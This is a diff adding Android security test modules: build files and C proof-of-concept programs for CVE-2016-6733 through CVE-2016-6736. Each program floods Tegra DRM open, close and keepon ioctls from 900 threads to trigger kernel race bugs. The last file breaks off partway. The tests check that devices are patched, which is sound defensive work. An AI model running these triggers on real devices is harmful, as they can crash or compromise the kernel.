+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
